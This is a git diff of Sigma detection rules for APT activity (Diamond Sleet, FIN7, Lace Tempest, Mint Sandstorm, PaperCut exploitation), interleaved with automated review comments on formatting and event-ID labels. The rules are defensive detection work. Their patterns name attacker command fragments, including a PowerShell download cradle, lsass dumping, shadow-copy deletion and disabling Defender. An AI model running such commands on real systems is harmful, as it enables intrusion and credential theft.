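Review bot: The comment added to the related entry in the task-scheduler rule, `# Security-Audting Eventlog`, misspells "Auditing"; suggest `- id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 # Security-Auditing Eventlog`. The sibling win_security rule's hunk earlier on this line re-indents its reverse reference without adding any such comment, so giving it the matching `# Task Scheduler Eventlog` annotation would keep the pair symmetric and make the cross-reference self-explanatory in both directions.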
@@ -14,17 +14,15 @@ tags: logsource: product: windows service: taskscheduler - definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is - disabled by default and needs to be enabled in order for this detection to - trigger' + definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger' detection: taskscheduler: Channel: Microsoft-Windows-TaskScheduler/Operational selection: EventID: - - 129 - - 140 - - 141 + - 129 # Task Created + - 140 # Task Updated + - 141 # Task Deleted TaskName: - \defender - \Microsoft\DefenderService diff --git a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml index 8dfaa5de3..c758c8c1a 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml @@ -1,8 +1,7 @@ title: Diamond Sleet APT Process Activity Indicators id: b5495d8d-24ad-4a44-8caf-ceae9a07a5c2 status: experimental -description: Detects process creation activity indicators related to Diamond Sleet - APT +description: Detects process creation activity indicators related to Diamond Sleet APT references: - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' uTYNkfKxHiZrx3KJ' + CommandLine|contains: ' uTYNkfKxHiZrx3KJ' condition: process_creation and selection falsepositives: - Unlikely 
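Review bot: The comment `- 129 # Task Created` in the task-scheduler hunk mislabels the event: in the Microsoft-Windows-TaskScheduler/Operational log, 129 is "Created Task Process" (the scheduler launched the task's action), while task registration is event 106, so a reader tuning the EventID list would draw the wrong conclusion; worth confirming against the provider manifest, but I would write `- 129 # Created Task Process (task action launched)`. The comments on 140 and 141 (task updated / deleted) read correctly. Matching is unaffected because the rule keys on the TaskName list, which continues past the end of the hunk.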
diff --git a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml
index 5de37b18e..e3f0b4f68 100644
--- a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml
+++ b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml
@@ -1,10 +1,8 @@ title: Diamond Sleet APT Scheduled Task Creation - Registry id: 9f9f92ba-5300-43a4-b435-87d1ee571688 status: experimental -description: 'Detects registry event related to the creation of a scheduled task used - by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability - - ' +description: | + Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability references: - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml
index 6fe1a2552..bd2d0fd73 100644
--- a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml
+++ b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml
@@ -1,10 +1,8 @@ title: Diamond Sleet APT Scheduled Task Creation id: 3b8e5084-4de9-449a-a40d-0e11014f2e2d status: experimental -description: 'Detects registry event related to the creation of a scheduled task used - by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability - - ' +description: | + Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability references: - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,9 +16,7 @@ tags: logsource: product: windows service: security - definition: The Advanced Audit Policy setting Object Access > Audit Other Object - Access Events has to be configured to allow this detection. We also recommend - extracting the Command field from the embedded XML in the event data. + definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data. detection: security: Channel: Security diff --git a/sigma/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml b/sigma/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml index 8749f7b19..42d31a657 100644 --- a/sigma/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml +++ b/sigma/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml 
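Review bot: The rewritten description still reads `Detects registry event related to the creation of a scheduled task`, yet this rule's logsource is `service: security` with `Channel: Security` (second hunk on this line), so the text appears to have been carried over from the registry_event sibling on the previous line. Suggest `Detects a Security-log event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability`, so an analyst triaging a hit is not sent to the wrong log. The detection block itself continues past the end of the second hunk.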
@@ -1,8 +1,7 @@ title: Potential APT FIN7 POWERHOLD Execution id: 71c432c4-e4da-4eab-ba49-e60ea9a81bca status: test -description: Detects execution of the POWERHOLD script seen used by FIN7 as reported - by WithSecureLabs +description: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml b/sigma/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml index 417064804..180ec761d 100644 --- a/sigma/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml +++ b/sigma/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml @@ -1,8 +1,7 @@ title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity id: 911389c7-5ae3-43ea-bab3-a947ebdeb85e status: experimental -description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs - for reconnaissance and POWERTRASH execution +description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - -noni -nop -exe bypass -f \\\\ - ADMIN$ selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - -ex bypass -noprof -nolog -nonint -f - C:\Windows\Temp\ condition: process_creation and (1 of selection_*) 
diff --git a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml
index 51baf91ce..59af99f0a 100644
--- a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml
+++ b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml
@@ -1,10 +1,8 @@ title: Lace Tempest PowerShell Evidence Eraser id: b377ddab-502d-4519-9e8c-5590033d2d70 status: experimental -description: 'Detects a PowerShell script used by Lace Tempest APT to erase evidence - from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team - - ' +description: | + Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml
index e2da44389..b7c27b5b4 100644
--- a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml
+++ b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml
@@ -1,10 +1,8 @@ title: Lace Tempest PowerShell Launcher id: 37dc5463-f7e3-4f61-ad76-ba59cd02a651 status: experimental -description: 'Detects a PowerShell script used by Lace Tempest APT to launch their - malware loader by exploiting CVE-2023-47246 as reported by SysAid Team - - ' +description: | + Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml index 00260eb73..c692c3e8c 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml @@ -1,8 +1,7 @@ title: Lace Tempest Cobalt Strike Download id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d status: experimental -description: Detects specific command line execution used by Lace Tempest to download - Cobalt Strike as reported by SysAid Team +description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring( - /a') condition: process_creation and selection 
diff --git a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml index 9d5be3d39..2ab168f21 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml @@ -1,8 +1,7 @@ title: Lace Tempest Malware Loader Execution id: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d status: experimental -description: Detects execution of a specific binary based on filename and hash used - by Lace Tempest to load additional malware as reported by SysAid Team +description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: :\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe + NewProcessName|endswith: :\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe selection_hash: Hashes|contains: SHA256=B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml index 0e7b682a4..090789553 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml 
+++ b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml 
@@ -22,99 +22,98 @@ detection: - aspera - \ruby selection_special_child_powershell_img: - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \powershell_ise.exe selection_special_child_powershell_cli: - - CommandLine|contains: - - ' echo ' - - -dumpmode - - -ssh - - .dmp - - add-MpPreference - - adscredentials - - bitsadmin - - certutil - - csvhost.exe - - DownloadFile - - DownloadString - - dsquery - - ekern.exe - - FromBase64String - - 'iex ' - - iex( - - Invoke-Expression - - Invoke-WebRequest - - localgroup administrators - - net group - - net user - - o365accountconfiguration - - query session - - samaccountname= - - set-MpPreference - - svhost.exe - - System.IO.Compression - - System.IO.MemoryStream - - usoprivate - - usoshared - - whoami - - CommandLine|re: "[-/\u2013][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' selection_special_child_lsass_1: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special_child_lsass_2: - CommandLine|contains: + CommandLine|contains: - procdump - tasklist - findstr selection_child_wget: - CommandLine|contains: http - NewProcessName|endswith: \wget.exe + CommandLine|contains: http + NewProcessName|endswith: \wget.exe selection_child_curl: - CommandLine|contains: http - NewProcessName|endswith: \curl.exe + CommandLine|contains: http + NewProcessName|endswith: \curl.exe 
selection_child_script: - CommandLine|contains: + CommandLine|contains: - E:jscript - e:vbscript selection_child_localgroup: - CommandLine|contains|all: + CommandLine|contains|all: - localgroup Administrators - /add selection_child_net: - CommandLine|contains: net - CommandLine|contains|all: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: - user - /add selection_child_reg: - - CommandLine|contains|all: - - reg add - - DisableAntiSpyware - - \Microsoft\Windows Defender - - CommandLine|contains|all: - - reg add - - DisableRestrictedAdmin - - CurrentControlSet\Control\Lsa + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa selection_child_wmic_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - process call create selection_child_wmic_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - delete - shadowcopy selection_child_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin - delete - shadows selection_child_wbadmin: - CommandLine|contains|all: + CommandLine|contains|all: - wbadmin - delete - catalog - condition: process_creation and (selection_parent and (all of selection_special_child_powershell_* - or all of selection_special_child_lsass_* or 1 of selection_child_*)) + condition: process_creation and (selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)) falsepositives: - Unlikely level: critical diff --git a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml index b821112e6..35ef2972b 100644 
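Review bot: The `CommandLine|re` value now carries a literal en dash inside `[-/–]` in place of the previous `\u2013` escape, so the character class is only correct if every consumer reads the file as UTF-8; the escaped double-quoted form produced the identical pattern and was encoding-independent. Unless the converter cannot emit escapes in single-quoted scalars, keeping `CommandLine|re: "[-/\u2013][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}"` is the more portable choice, and a one-line comment naming the dash variants the class is meant to cover would stop a future reformat from silently normalising it. The same rewrite appears in the manage_engine rule's hunk further down this diff. The selection_parent block this hunk opens on begins above the hunk header.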
--- a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml @@ -20,7 +20,7 @@ detection: selection: ParentProcessName|endswith: \ws_tomcatservice.exe filter_main_repadmin: - NewProcessName|endswith: \repadmin.exe + NewProcessName|endswith: \repadmin.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml index 5801564dd..eca187be5 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml 
@@ -24,105 +24,103 @@ detection: selection_parent_image: ParentProcessName|contains: \java selection_special_child_powershell_img: - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \powershell_ise.exe selection_special_child_powershell_cli: - - CommandLine|contains: - - ' echo ' - - -dumpmode - - -ssh - - .dmp - - add-MpPreference - - adscredentials - - bitsadmin - - certutil - - csvhost.exe - - DownloadFile - - DownloadString - - dsquery - - ekern.exe - - FromBase64String - - 'iex ' - - iex( - - Invoke-Expression - - Invoke-WebRequest - - localgroup administrators - - net group - - net user - - o365accountconfiguration - - query session - - samaccountname= - - set-MpPreference - - svhost.exe - - System.IO.Compression - - System.IO.MemoryStream - - usoprivate - - usoshared - - whoami - - CommandLine|re: "[-/\u2013][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' selection_special_child_lsass_1: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special_child_lsass_2: - CommandLine|contains: + CommandLine|contains: - procdump - tasklist - findstr selection_child_wget: - CommandLine|contains: http - NewProcessName|endswith: \wget.exe + CommandLine|contains: http + NewProcessName|endswith: \wget.exe selection_child_curl: - CommandLine|contains: http - NewProcessName|endswith: \curl.exe + CommandLine|contains: http + 
NewProcessName|endswith: \curl.exe selection_child_script: - CommandLine|contains: + CommandLine|contains: - E:jscript - e:vbscript selection_child_localgroup: - CommandLine|contains|all: + CommandLine|contains|all: - localgroup Administrators - /add selection_child_net: - CommandLine|contains: net - CommandLine|contains|all: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: - user - /add selection_child_reg: - - CommandLine|contains|all: - - reg add - - DisableAntiSpyware - - \Microsoft\Windows Defender - - CommandLine|contains|all: - - reg add - - DisableRestrictedAdmin - - CurrentControlSet\Control\Lsa + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa selection_child_wmic_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - process call create selection_child_wmic_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - delete - shadowcopy selection_child_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin - delete - shadows selection_child_wbadmin: - CommandLine|contains|all: + CommandLine|contains|all: - wbadmin - delete - catalog filter_main: - CommandLine|contains|all: + CommandLine|contains|all: - download.microsoft.com - manageengine.com - msiexec - condition: process_creation and (all of selection_parent_* and (all of selection_special_child_powershell_* - or all of selection_special_child_lsass_* or 1 of selection_child_*) and not - filter_main) + condition: process_creation and (all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main) falsepositives: - Unlikely level: critical 
diff --git a/sigma/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml b/sigma/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml index 1bc09f4aa..646cdeb78 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml @@ -1,8 +1,7 @@ title: Potential APT Mustang Panda Activity Against Australian Gov id: 7806bb49-f653-48d3-a915-5115c1a85234 status: experimental -description: Detects specific command line execution used by Mustang Panda in a targeted - attack against the Australian government as reported by Lab52 +description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 references: - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - copy SolidPDFCreator.dll - C:\Users\Public\Libraries\PhotoTvRHD\SolidPDFCreator.dll selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - \Windows\CurrentVersion\Run - SolidPDF diff --git a/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml b/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml index 92d4bb63d..d7ae05264 100644 --- a/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml 
+++ b/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - powershell - -nop -w hidden @@ -26,7 +26,7 @@ detection: - setup.msi - -OutFile selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'msiexec ' - '/i ' - 'setup.msi ' diff --git a/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml b/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml index 7fea5165e..b5ce9df0e 100644 --- a/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml +++ b/sigma/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml @@ -1,8 +1,7 @@ title: PaperCut MF/NG Potential Exploitation id: 0934ac71-a331-4e98-a034-d49c491fbbcb status: test -description: Detects suspicious child processes of "pc-app.exe". Which could indicate - potential exploitation of PaperCut +description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut references: - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software - https://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml @@ -21,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \pc-app.exe - NewProcessName|endswith: + NewProcessName|endswith: - \bash.exe - \calc.exe - \certutil.exe 
diff --git a/sigma/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml b/sigma/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml index 268c01ba7..48793077e 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: QP's\*(58vaP!tF4 + CommandLine|contains: QP's\*(58vaP!tF4 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml b/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml index 5f0cd298d..b48fc1c81 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml @@ -1,8 +1,7 @@ title: New Firewall Rule Added In Windows Firewall Exception List id: cde0a575-7d3d-4a49-9817-b8004a7bf105 status: experimental -description: Detects when a rule has been added to the Windows Firewall exception - list +description: Detects when a rule has been added to the Windows Firewall exception list references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) author: frack113 
@@ -19,25 +18,24 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2004 - - 2071 + - 2004 # A rule has been added to the Windows Defender Firewall exception list + - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11) filter_main_block: Action: 2 filter_main_installations: - - ApplicationPath|startswith: - - C:\Program Files\ - - C:\Program Files (x86)\ - - ModifyingApplication|startswith: C:\Windows\WinSxS\ - - ModifyingApplication: - - C:\Windows\System32\oobe\Setup.exe - - C:\Windows\SysWOW64\msiexec.exe - - C:\Windows\System32\svchost.exe - - C:\Windows\System32\dllhost.exe - - C:\Program Files\Windows Defender\MsMpEng.exe + - ApplicationPath|startswith: + - C:\Program Files\ + - C:\Program Files (x86)\ + - ModifyingApplication|startswith: C:\Windows\WinSxS\ # TiWorker.exe + - ModifyingApplication: + - C:\Windows\System32\oobe\Setup.exe + - C:\Windows\SysWOW64\msiexec.exe + - C:\Windows\System32\svchost.exe + - C:\Windows\System32\dllhost.exe + - C:\Program Files\Windows Defender\MsMpEng.exe filter_optional_msmpeng: ModifyingApplication|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ ModifyingApplication|endswith: \MsMpEng.exe - condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: firewall_as and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) level: medium ruletype: Sigma diff --git a/sigma/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml b/sigma/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml index 2fef15afb..892edad73 100644 --- a/sigma/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml +++ b/sigma/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml 
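Review bot: The comment on `- 2004` omits the `(Windows 10)` qualifier that the matching comment in win_firewall_as_add_rule_susp_folder.yml carries, so the two rules now describe the same event pair differently; suggest `- 2004 # A rule has been added to the Windows Defender Firewall exception list. (Windows 10)`. The `# TiWorker.exe` comment on the WinSxS filter would also be clearer if it said that the `startswith` match excludes any modifying application under `C:\Windows\WinSxS\`, not just that binary, since that is the actual scope of the exclusion a tuner needs to be aware of.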
@@ -1,11 +1,10 @@ title: New Firewall Exception Rule Added For A Suspicious Folder id: 9e2575e7-2cb9-4da1-adc8-ed94221dca5e related: - - id: cde0a575-7d3d-4a49-9817-b8004a7bf105 - type: derived + - id: cde0a575-7d3d-4a49-9817-b8004a7bf105 + type: derived status: experimental -description: Detects the addition of a rule to the Windows Firewall exception list - where the application resides in a suspicious folder +description: Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) - https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/# @@ -23,8 +22,8 @@ detection: Channel: Microsoft-Windows-Windows Firewall With Advanced Security/Firewall selection: EventID: - - 2004 - - 2071 + - 2004 # A rule has been added to the Windows Defender Firewall exception list. (Windows 10) + - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11) ApplicationPath|contains: - \AppData\ - \Temp\ @@ -40,8 +39,7 @@ detection: 